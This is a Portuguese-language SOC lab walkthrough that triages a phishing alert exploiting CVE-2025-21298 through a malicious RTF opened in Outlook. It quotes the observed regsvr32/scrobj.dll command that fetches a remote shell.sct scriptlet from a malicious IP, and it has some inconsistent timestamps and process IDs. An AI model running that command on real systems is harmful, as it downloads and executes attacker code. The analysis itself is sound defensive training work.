SOC336 - Exploração de RCE Zero-Click do Windows OLE Detectada (CVE-2025-21298) Walkthrough
Um de nossos funcionários, Austin, recebeu um e-mail de phishing de um remetente suspeito e um alerta foi acionado depois que ele abriu o e-mail usando o Outlook em 04 de Fevereiro de 2025, às 16:18. O motivo do acionamento foi "Anexo RTF malicioso identificado com padrão de exploração CVE-2025-21298 conhecido" .

EventID : 314
Hora do Evento : 04 de Fevereiro de 2025, 16:18 (Acho que estava errado)
Regra : SOC336 - Exploração de RCE Zero-Click OLE do Windows Detectada (CVE-2025-21298)
Nível : Analista de Segurança
Endereço SMTP : 84.38.130.118
Endereço de Origem : [email protected]
Endereço de Destino : [email protected]
Assunto do E-mail : Importante: Ação Necessária para Prazo de Projeto Futuro
Anexo : mail.rtf
Hash do Anexo : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
Ação do Dispositivo : Permitido
Motivo do Acionamento : Anexo RTF malicioso identificado com padrão de exploração CVE-2025-21298 conhecido.
Vamos nos aprofundar na Segurança de E-mail, Gerenciamento de Logs e Logs de Segurança de Endpoint para a triagem do alerta.

Pesquisei o endereço do remetente projectmanagement@pm[.]me e cliquei no e-mail "Importante: Ação Necessária para Prazo de Projeto Futuro" enviado às 05:12 do mesmo dia, o que me pareceu estranho, pois o tom urgente e as palavras como "Importante" e "Ação Necessária" me deram a impressão de um e-mail de phishing.

Pesquisei o domínio pm[.]me no VirusTotal e apenas 1 fornecedor o considerou suspeito.

No entanto, quando pesquisei o endereço SMTP 84[.]38[.]130[.]118, 7 fornecedores o classificaram como Malicioso e Malware, e estava relacionado ao servidor C2 SILVER.


84[.]38[.]130[.]118 também foi encontrado no banco de dados do AbuseIPDB. Ele está localizado em Riga, Riga, Letônia, pertence ao nome de domínio rixhost.lv e é categorizado como Ataque DDoS, Hacking e Host Explorado.

Finalmente, pesquisei o hash df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 do anexo mail.rtf no VirusTotal e 29 dos 61 fornecedores classificaram o anexo como Malicioso. Ele pertence à família de malware rtfmalformb e foi associado à vulnerabilidade CVE-2025-21298.
Foi confirmado que um e-mail de phishing com um anexo malicioso foi enviado para Austin.
Vamos investigar se houve atividades suspeitas após as 05:12, quando Austin abriu o e-mail de phishing.

Primeiro, verifiquei o log de proxy e pesquisei o endereço IP malicioso do remetente 84[.]38[.]130[.]118, descobrindo que às 08:06 houve uma requisição HTTP GET para o endereço IP malicioso com a URL hxxp://84[.]38[.]130[.]118/shell[.]sct iniciada pelo cmd.exe, baixando um arquivo scriptlet do Windows. O código de resposta foi 200 OK, indicando que o tráfego de saída foi permitido e não bloqueado pelo firewall. Era incomum obter um arquivo de script que possivelmente continha um script de reverse shell.


Como o tráfego de saída para o endereço IP malicioso foi iniciado pelo cmd.exe, primeiro verifiquei o histórico do terminal e descobri que às 08:06:08 foi executado o comando "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" para gerar o regsvr32.exe e buscar o arquivo de script do endereço IP malicioso através do scrobj.dll
Usar utilitários nativos do Windows para buscar o script pode deixar traços mínimos no sistema, dificultando o processo de engenharia reversa e análise de malware!

Foi confirmado que houve uma conexão com o IP malicioso 84[.]38[.]130[.]118 às 08:06:42, após o evento de execução do comando.
Então, por que o cmd.exe foi executado apenas ao clicar em um e-mail? Como não foi encontrada nenhuma evidência de download do anexo malicioso mail.rtf por Austin, verifiquei os logs do endpoint e pesquisei qualquer evento por volta das 08:06.

ID do Processo: 7023
Hora do Evento: 04 Fev 2025 08:06:25
Linha de Comando: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
Processo Pai: cmd.exe

OK, então vamos ver o processo pai cmd.exe
ID do Processo: 6784
Hora do Evento: 04 Fev 2025 08:06:08
Linha de Comando: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
Processo Pai: outlook.exe

E finalmente verifiquei o processo pai do outlook.exe
ID do Processo: 4820
Hora do Evento: 04 Fev 2025 08:05:15
Linha de Comando: "C:\Windows\System32\cmd.exe"
Processo Pai: explorer.exe
Portanto, podemos concluir a árvore de processos maliciosos:
explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! Execução do Script !
No entanto, ainda me questionava como os processos maliciosos foram iniciados sem baixar e abrir o anexo malicioso, e como o outlook.exe gerou o processo malicioso, até encontrar informações sobre a CVE-2025-21298.

De acordo com o artigo da Offsec, havia uma vulnerabilidade crítica OLE Zero-Click no Windows que permitia RCE por e-mail com uma pontuação CVSS de 9.8 em Janeiro de 2025. Quando o destinatário alvo apenas abre ou visualiza o e-mail malicioso no Microsoft Outlook contendo um documento RTF prejudicial com um script incorporado , a vulnerabilidade é acionada, permitindo que o atacante execute código arbitrário no sistema afetado.
Fiz algumas pesquisas sobre OLE do Windows e os processos de sequestro de documentos RTF no Google e Gemini, relacionados ao meu conhecimento de engenharia reversa:






Não em Quarentena

Malicioso

Acessado







Classificação: Crítico
Tipo: Malware
Horário da Atividade:
04 de Fevereiro de 2025, 05:12 (E-mail de phishing recebido)
04 de Fevereiro de 2025, 08:05:15 - 04 de Fevereiro de 2025, 08:06:42 (E-mail de phishing aberto e código malicioso executado)
Entidades Afetadas:
Endereço de Origem: projectmanagement@pm[.]me
Endereço SMTP: 84[.]38[.]130[.]118
Endereço de E-mail do Destinatário: Austin@letsdefend[.]io
Endereço IP do Destinatário: 172[.]16[.]17[.]137
Nome do Host: Austin
Motivos para Verdadeiro Positivo:
Em 04 de Fevereiro de 2025, às 05:12, um e-mail suspeito com assunto "Importante: Ação Necessária para Prazo de Projeto Futuro" foi enviado de [email protected] (Endereço IP: 84.38.130.118) para [email protected] (Endereço IP: 172.16.17.137) com um anexo mail.rtf (hash SHA256: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). O tom de urgência e as palavras usadas no assunto deram a impressão de um e-mail de phishing. As inteligencias de ameaças VirusTotal e AbuseIPDB classificaram o endereço IP do remetente, localizado em Riga, Riga, Letônia e pertencente ao nome de domínio rixhost.lv, e o anexo como maliciosos e malware.
De acordo com os logs de proxy, às 08:06 houve uma requisição HTTP GET para o endereço IP malicioso com a URL hxxp://84[.]38[.]130[.]118/shell[.]sct iniciada pelo cmd.exe, baixando um arquivo scriptlet do Windows. O código de resposta foi 200 OK, indicando que o tráfego de saída para o endereço IP malicioso foi permitido e não bloqueado pelo firewall.
De acordo com os logs de Segurança de Endpoint, o código malicioso "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) foi iniciado pelo cmd.exe (PID: 6784) gerado a partir do outlook.exe (PID: 4820)
A exploração foi causada por uma vulnerabilidade crítica OLE Zero-Click no Windows (CVE-2025-21298) que permite RCE por e-mail com uma pontuação CVSS de 9.8 em Janeiro de 2025. Quando o destinatário alvo apenas abre ou visualiza o e-mail malicioso no Microsoft Outlook contendo um documento RTF prejudicial com um script incorporado, a vulnerabilidade é acionada, permitindo que o atacante execute código arbitrário no sistema afetado, potencialmente estabelecendo um reverse shell para o servidor C2.
Motivos para Escalação:
Embora o tráfego de rede C2 ativo pós-exploração ainda não tenha sido observado de forma definitiva, os logs de segurança do endpoint confirmaram a execução do regsvr32.exe usando scrobj.dll para buscar o arquivo scriptlet shell.sct. Devido à pontuação CVSS de 9.8 da CVE-2025-21298, é necessária uma investigação adicional para verificar se há alguma atividade suspeita no host, como persistência ou exfiltração de dados.
Remediações:
Indicadores de Compromisso: